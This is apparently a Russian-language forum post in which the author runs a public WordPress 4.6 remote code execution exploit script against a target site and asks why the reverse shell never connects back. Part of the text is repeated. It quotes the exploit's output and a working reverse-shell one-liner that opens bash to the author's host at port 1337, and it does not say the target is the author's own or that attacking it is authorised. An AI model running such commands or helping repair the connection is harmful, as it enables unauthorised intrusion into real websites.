Хочу попробовать проэксплуатировать эксплойт: WP 4.6 Remote Code Execution
Ссылка: https://exploitbox.io/exploit/wordpress-rce-exploit.sh
В самом файле меняю rev_host на свой: rev_host="192.168.0.4"
Сам таргет нужной версии, netcat в системе есть.
При запуске: ./wordpress-rce-exploit.sh site.com я вижу:
Не подскажите в чём может быть дело? Вангую, что что-то не так с обратным доступом к моей машине и реверс-шелл не может достучаться.
Ссылка: https://exploitbox.io/exploit/wordpress-rce-exploit.sh
В самом файле меняю rev_host на свой: rev_host="192.168.0.4"
Сам таргет нужной версии, netcat в системе есть.
При запуске: ./wordpress-rce-exploit.sh site.com я вижу:
- Кусок HTML-я
- [+] Payload sent successfully
- [+] Payload executed!
- Waiting for the target to send us a reverse shell...
- Кусок HTML-я
- Warning: Inverse name lookup failed for `0.0.5.57'
- Listening on any address 42627
(sleep 3s && nohup bash -i >/dev/tcp/192.168.0.4/1337 0<&1 2>&1) &Не подскажите в чём может быть дело? Вангую, что что-то не так с обратным доступом к моей машине и реверс-шелл не может достучаться.